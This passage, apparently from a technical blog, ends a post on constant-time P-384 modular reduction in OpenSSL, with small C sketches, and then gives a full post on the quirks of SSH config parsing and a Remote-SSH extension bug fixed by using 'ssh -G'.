A goal in designing this algorithm is to ensure that acc[6] has as tight a bound as reasonably possible. Intuitively, if we can cause acc[6] to be as large as possible by absorbing the high bits of lower limbs, we reduce the number of bits that must be carried forward later on. As such, we perform a carry of the high-bits of acc[4], acc[5] into acc[6] before we begin our substitution.

Again, let

$$X_3 = \sum^{5}_{k=0}\texttt{acc[k]}t^k + (\texttt{acc[6]} \text{(low bits)})t^6$$
$$Y_3 = 2^{48}(\texttt{acc[6]} \text{(high bits, right shifted)}) t^6$$

The equation for eliminating \(2^{48}t^6\) is pretty straightforward:

$$2^{384} = 2^{48}t^6 \equiv 2^{16}t^2 + 2^{40}t + (-2^{32} + 1) \mod{f(t)}$$

Carries

Finally, as each of the accumulator limbs can still contain values larger than \(2^{56}\), we carry their respective high bits up into the next limb so as to remove any redundancy. Conveniently, our preemptive carrying before the third substitution has granted us a pretty tight bound on our final calculation - the final reduced number lies in the range \([0, 2^{384}]\).
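
In code, one pass of that carry chain is nothing more than (a sketch, with the same illustrative names as before):

    /* Carry: move each limb's bits above the low 56 into the limb above. */
    for (int i = 0; i < 6; i++) {
        acc[i + 1] += acc[i] >> 56;
        acc[i]     &= 0x00ffffffffffffff;
    }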

Canonicalisation

This is 'just the right amount of reduction' but not canonicalisation. That is, since \(0 < p_{384} < 2^{384}\), there can be multiple possible reduced values for a given congruence class. felem_contract is a method which uses the fact that \(0 \leq x < 2 p_{384}\) to further reduce the output of felem_reduce into the range \([0, p_{384})\) in constant time.

This code has many more dragons I won't explain here, but the basic premise of the calculations performed there is as follows:

Given a 385 bit input, checking whether our input (expressed as a concatenation of bits) \(b_{384}b_{383} \ldots b_1b_0\) is greater than or equal to \(p_{384}\) whose bits we denote \(q_{384}, \ldots, q_0\) (\(q_{384} = 0\)) is determined by the following logical predicate (\(G(384)\)):

$$G(k) \equiv (b_k \land \lnot q_k) \lor ((b_k = q_k) \land G(k-1))$$
$$G(0) \equiv (b_0 = q_0)$$

With \(p_{384}\) being a Solinas/Pseudo-Mersenne prime, it has a large number of contiguous runs of repeated bits, so we can of course use this to massively simplify our predicate. Doing this in constant time involves some interesting bit-shifting/masking shenanigans. Essentially, you want a bit vector of all ones or all zeros depending on the value of \(G(384)\); we then logically 'and' \(p_{384}\) with this bitmask to 'conditionally' subtract it from our result.
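
The core of that trick looks something like the following sketch (ge stands for the 0/1 result of evaluating \(G(384)\), and p384_limbs for the limbs of \(p_{384}\) - both names are mine; borrow propagation between limbs is glossed over):

    /* Stretch the 0/1 comparison result into an all-ones or all-zeros
     * mask, then 'conditionally' subtract p_384 without branching. */
    uint64_t mask = 0 - (uint64_t)ge;   /* 0x00...0 or 0xff...f */

    for (int i = 0; i < 7; i++)
        out[i] -= p384_limbs[i] & mask;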

A Side Note about the Weird Constants

Okay so we're implementing our modular arithmetic with unsigned integer limbs that together represent a number of the following form:

$$x = \sum_{k = 0}^{n-1} 2^{dk} l_k$$

How do we then do subtractions in a way which will make underflow impossible? Well, computing \(a - b\) is really straightforward if every limb of \(a\) is larger than the corresponding limb of \(b\). We then add a suitable multiple of \(p_{384}\) to \(a\) that causes each limb of \(a\) to be sufficiently large.

Thankfully, with redundant-limb arithmetic, we can do this easily by means of telescopic sums. For example, in felem_reduce we wanted all limbs of our \(p_{384}\) multiple to be sufficiently large. We overshot any requirement and chose a multiple whose limbs are all bounded below by \(2^{123}\). We first scale our prime so that its 'lead term' (speaking in the polynomial representation) is \(2^{124}\).

$$2^{76} f(t) = 2^{124} t^6 - 2^{92} t^2 - 2^{116} t + (2^{108} - 2^{76}) t^0$$

Notice that most limbs of this multiple (the limbs will be the coefficients) are either too small or negative. We then transform this expression into a suitable telescopic sum. Observe that when \(t = 2^{56}\), \(2^{124} t^k = 2^{124-56}t^{k+1} = 2^{68} t^{k+1}\), and so we can simply introduce a \(2^{124}\) term into each limb that needs one by means of addition, subtracting the equivalent \(2^{68}\) from the limb above.

$$ \begin{align*} 2^{76} f(t) &= (2^{124} - 2^{68}) t^6 \\ &+ (2^{124} - 2^{68}) t^5 \\ &+ (2^{124} - 2^{68}) t^4 \\ &+ (2^{124} - 2^{68}) t^3 \\ &+ (2^{124} - 2^{92} - 2^{68}) t^2 \\ &+ (2^{124} - 2^{116} - 2^{68}) t \\ &+ (2^{124} + 2^{108} - 2^{76}) \end{align*} $$

We can then subtract values whose limbs are no larger than the least of these limbs above without fear of underflows providing us with an incorrect result. In our case, that upper bound for limb value is \(2^{124} - 2^{116} - 2^{68} > 2^{123}\). Very comfortable.
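
In code, a subtraction helper built on this idea first adds those limb constants and then subtracts limb-wise. A sketch (assuming 128-bit accumulator limbs via the uint128_t type from earlier; the function name is mine):

    /* out -= in, made underflow-proof by first adding 2^76 * p_384,
     * written as the telescopic sum derived above. */
    static void felem_diff_sketch(uint128_t out[7], const uint128_t in[7])
    {
        const uint128_t two124_m68 =
            (((uint128_t)1) << 124) - (((uint128_t)1) << 68);
        const uint128_t two124_m92_m68  = two124_m68 - (((uint128_t)1) << 92);
        const uint128_t two124_m116_m68 = two124_m68 - (((uint128_t)1) << 116);
        const uint128_t two124_p108_m76 = (((uint128_t)1) << 124)
                                        + (((uint128_t)1) << 108)
                                        - (((uint128_t)1) << 76);

        out[6] += two124_m68;
        out[5] += two124_m68;
        out[4] += two124_m68;
        out[3] += two124_m68;
        out[2] += two124_m92_m68;
        out[1] += two124_m116_m68;
        out[0] += two124_p108_m76;

        for (int i = 0; i < 7; i++)
            out[i] -= in[i];
    }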

Concerning Timing Side-Channels

Cryptographic routines must perform all of their calculations in constant time. More specifically, it is important that the time taken by cryptographic code does not reveal any private keys or random nonces used during computation. Ultimately, all of our work so far has been to speed up field arithmetic in the field of integers modulo the prime \(p_{384}\). But this is done in order to facilitate calculations on the secp384r1 elliptic curve, and ECDSA/ECDH each depend on being able to perform scalar 'point multiplication' (repeated application of the group operator). Since such an operation is inherently iterative, it presents the greatest potential for timing attacks.

We implement constant-time multiplication with the wNAF ladder method. This relies on pre-computing a window of multiples of the group generator, and then scaling and selectively adding multiples when required. Wikipedia provides a helpful primer to this method by cumulatively building upon more naive approaches.

Conclusion

While the resulting code borrows from and uses the common language of Solinas reduction, ultimately a number of implementation decisions were guided by heuristics - going from theory to implementation was far from cut and dried. The limb size, carry order, choice of substitutions, as well as the pre- and post-conditions made here, are ultimately somewhat arbitrary. You could easily imagine further refinements obtaining a better result. For now, I hope this post serves to demystify the inner workings of ECC implementations in OpenSSL. These algorithms, although particular and sophisticated, need not be immutable.

Quirks of parsing SSH configs

Introduction

I've been using the VSCodium Open Remote - SSH extension recently with great results. I can treat everything as a single environment, without any worry about syncing between my local development files and the remote. This is very different to mounting the remote as a network drive and opening a local instance of VSCodium on it: in addition to crippling latency on every action, a locally mounted drive doesn't bring the build context that tools like clangd require (e.g., system headers).

Instead, the remote extension runs a server on the remote that performs most actions, and the local VSCodium instance acts as a client that buffers and caches data seamlessly, so the experience is nearly as good as developing locally.

For example, a project wide file search on a network drive is unusably slow because every file and directory read requires a round trip back to the remote, and the latency is just too large to finish getting results back in a reasonable time. But with the client-server approach, the client just sends the search request to the server for it to fulfil, and all the server has to do is send the matches back. This eliminates nearly all the latency effects, except for the initial request and receiving any results.

However there has been one issue with using this for everything: the extension failed to connect when I wasn't on the same network as the host machine. So I wasn't able to use it when working from home over a VPN. In this post we find out why this happened, and in the process look at some of the weird quirks of parsing an SSH config.

The issue

As above, I wasn't able to connect to my remote machines when working from home. The extension would abort with the following error:

[Error  - 00:23:10.592] Error resolving authority
Error: getaddrinfo ENOTFOUND remotename.ozlabs.ibm.com
    at GetAddrInfoReqWrap.onlookup [as oncomplete] (node:dns:109:26)

So it's a DNS issue. This would make sense, as the remote machine is not exposed to the internet, and must instead be accessed through a proxy. What's weird is that the integrated terminal in VSCodium has no problem connecting to the remote. So the extension seems to be doing something different than just a plain SSH connection.

You might think that the extension is not reading the SSH config. But the extension panel lists all the host aliases I've declared in the config, so it's clearly aware of the config at least. Possibly it doesn't understand the proxy config correctly? If it were trying to connect directly, without going through the proxy, a failed DNS lookup would make sense.

Investigating

Enough theorising, time to debug the extension as it tries to connect.

From the error above, the string "Error resolving authority" looks like something I can search for. This takes me to the catch case for a large try-catch block. It could be annoying to narrow down which part of the block throws the exception, but fortunately debugging is as easy as installing the dependencies and running the pre-configured 'Extension' debug target. This opens a new window with the local copy of the extension active, and I can debug it in the original window.

In this block, there is a conditional statement on whether the ProxyJump field is present in the config. This is a good place to break on and see what the computed config looks like. If it doesn't find a proxy then of course it's going to run everything on the host.

And indeed, it doesn't think there is a proxy. This is progress, but why does the extension's view of the config not match up with what SSH does? After all, invoking SSH directly connects properly. Tracing back the source of the config in the extension, it ultimately comes from manually reading in and parsing the SSH config. When resolving the host argument it manually computes the config as per ssh_config(5). Yet somewhere it makes a mistake, because it doesn't include the ProxyJump field.

Parsing SSH config

To get to the bottom of this, we need to know the rules behind parsing SSH configs. The ssh_config(5) manpage does a pretty decent job of explaining this, but I'm going to go over the relevant information here. I reckon most people have a vague idea of how it works, and can write enough to meet their needs, but have never looked deeper into the actual rules behind how SSH parses the config.

  1. For starters, the config is parsed line by line. Leading whitespace (i.e., indentation) is ignored. So, while indentation makes it look like you are configuring properties for a particular host, this isn't quite correct. Instead, the Host and Match lines are special statements that enable or disable all subsequent lines until the next Host or Match.

    There is no backtracking; previous conditions and lines are not re-evaluated after learning more about the config later on.

  2. When a config line is seen, and is active thanks to the most recent Host or Match succeeding, its value is selected if it is the first of that config to be selected. So the earliest place a value is set takes priority; this may be a little counterintuitive if you are used to having the latest value be picked, like enable/disable command line flags tend to work.

  3. When HostName is set, it replaces the host value in Match matches. It is also used as the Host value during a final pass (if requested).

  4. The last behaviour of interest is the Match final rule. There are several conditions a Match statement can have, and the final rule says make this active on the final pass over the config.

Wait, final pass? Multiple passes? Yes. If final is a condition on a Match, SSH will do another pass over the entire config, following all the rules above. Except this time all the configs we read on the first pass are still active (and can't be changed). But all the Host and Matches are re-evaluated, allowing other configs to potentially be set. I guess that means rule (1) ought to have a big asterisk next to it.

Together, these rules can lead to some quirky behaviours. Consider the following config

Match host="*.ozlabs.ibm.com"
    ProxyJump proxy

Host example
    HostName example.ozlabs.ibm.com

If I run ssh example on the command line, will it use the proxy?

By rule (1), no. When testing the first Match host condition, our host value is currently example. It is not until we reach the HostName config that we start using example.ozlabs.ibm.com for these matches.

But by rule (4), the answer turns into maybe. If we end up doing a second pass over the config thanks to a Match final that could be anywhere else, we would now be matching example.ozlabs.ibm.com against the first line on the second go around. This will pass, and, since nothing has set ProxyJump yet, we would gain the proxy.

You may think, yes, but we don't have a Match final in that example. But if you thought that, then you forgot about the system config.

The system config is effectively appended to the user config, to allow any system wide settings. Most of the time this isn't an issue because of the first-come-first-served rule with config matches (rule 2). But if the system config includes a Match final, it will trigger the entire config to be re-parsed, including the user section. And it so happens that, at least on Fedora with the openssh-clients package installed, the system config does contain a Match final (see /etc/ssh/ssh_config.d).
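
For illustration, a drop-in as small as this (not the literal Fedora file, just the shape of it) is enough to force the second pass:

Match final all
    GSSAPIAuthentication yes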

But wait, there's more! If we want to specify a custom SSH config file, then we can use -F path/to/config in the command line. But this disables loading a system config, so we would no longer get the proxy!

To sum up, for the above config:

  1. ssh example doesn't have a proxy
  2. ...unless a system config contains Match final
  3. ...but invoking it as ssh -F ~/.ssh/config example definitely won't have the proxy
  4. ...but if a subprocess invokes ssh example while trying to resolve another host, it'll probably not add the -F ~/.ssh/config, so we might get the proxy again (in the child process).

Wait, how did that last one slip in? Well, unlike environment variables, it's a lot harder for processes to propagate command line flags correctly. If resolving the config involves running a script that itself tries to run SSH, chances are the -F flag won't be propagated and you'll see some weird behaviour.

I swear that's all for now, you've probably learned more about SSH configs than you will ever need to care about.

Back to VSCodium

Alright, armed now with this knowledge on SSH config parsing, we can work out what's going on with the extension. It ends up being a simple issue: it doesn't apply rules (3) and (4), so all Host matches are done against the original host name.

In my case, there are several machines behind the proxy, but they all share a common suffix, so I had a Host *.ozlabs.ibm.com rule to apply the proxy. I also use aliases to refer to the machines without the .ozlabs.ibm.com suffix, so failing to follow rule (3) led to the situation where the extension didn't think there was a proxy.

However, even if this were to be fixed, it still doesn't respect rule (4), or most complex match logic in general. If the hostname bug is fixed then my setup would work, but it's less than ideal to keep playing whack-a-mole with parsing bugs. It would be a lot easier if there was a way to just ask SSH for the config that a given host name resolves to.

Enter ssh -G. The -G flag asks SSH to dump the complete resolved config, without actually opening the connection (it may execute arbitrary code while resolving the config however!). So to fix the extension once and for all, we could swap the manual parser to just invoking ssh -G example, and parsing the output as the final config. No Host or Match or HostName or Match final quirks to worry about.
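
As a rough idea of what that looks like (the exact fields and their order vary between OpenSSH versions):

$ ssh -G example | grep -iE '^(hostname|proxyjump)'
hostname example.ozlabs.ibm.com
proxyjump proxy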

Sure enough, if we replace the config backend with this 'native' resolver, we can connect to all the machines with no problem. Hopefully the pull request to add this support will get accepted, and I can stop running my locally patched copy of the extension.

In general, I'd suggest avoiding any dependency on a second pass being done on the config. Resolve your aliases early, so that the rest of your matches work against the full hostname. If you later need to match against the name passed in the command line, you can use Match originalhost=example. The example above should always be written as

Host example
    HostName example.ozlabs.ibm.com

Match host="*.ozlabs.ibm.com"
    ProxyJump proxy

even if the reversed order might appear to work thanks to the weird interactions described above. And after learning these parser quirks, I find the idea of using Host match statements unreliable; that they may or may not be run against the HostName value allows for truly strange bugs to appear. Maybe you should remove this uncertainty by starting your config with Match final so that it is at least always parsed the same way.